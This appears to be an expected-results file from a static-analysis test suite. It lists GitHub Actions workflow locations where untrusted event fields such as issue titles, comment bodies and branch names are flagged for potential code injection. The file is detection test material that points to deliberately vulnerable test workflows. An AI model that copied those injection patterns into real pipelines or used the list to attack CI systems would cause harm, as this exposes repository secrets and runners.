.github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | 